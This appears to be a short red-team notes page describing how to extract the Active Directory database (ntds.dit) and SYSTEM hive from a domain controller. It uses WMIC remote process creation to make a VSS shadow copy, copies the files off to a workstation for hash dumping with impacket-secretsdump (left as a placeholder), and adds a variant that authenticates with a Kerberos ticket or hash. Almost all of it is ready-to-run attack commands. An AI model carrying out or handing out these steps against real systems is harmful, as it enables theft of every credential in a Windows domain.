NTDS

From RCATs

Pulling the ntds.dit remotely using VSS shadow copy (over WMI or PowerShell Remoting)

Leverage WMIC (or PowerShell remoting) to Create (or copy existing) VSS.

# Take a snapshot of the VSS.
wmic /node:Tech-DC /user:DOMAIN\someuser /password:cleartextpass process call create "cmd /c vssadmin create shadow /for=c: 2>&1 > c:\vss.log"

# Once the VSS snapshot has been completed, copy the NTDS.dit file and the System Registry Hive to the C: drive on the DC.
1. wmic /node:Tech-DC /user:DOMAIN\someuser /password:cleartextpass process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Windows\temp\NTDS.dit 2>&1 > C:\vss2.log"
2. wmic /node:Tech-DC /user:DOMAIN\someuser /password:cleartextpass process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Windows\temp\SYSTEM.hive 2>&1 > C:\vss2.log"

# Copy the below files from the C:\temp directory on the DC to the local workstation 
PS C:\Windows\system32> copy \\Tech-DC\c$\windows\temp\ntds.dit c:\temp
PS C:\Windows\system32> copy \\Tech-DC\c$\windows\temp\system.hive c:\temp

insert impacket-secretsdump command here

Use hash instead of clear text credentials. Note: This will require creating a new session with an imported ticket with the user's hash.

# Replace the commands from above with these commands.
/user:DOMAIN\someuser -> /authority:"kerberos:DOMAIN\someuser"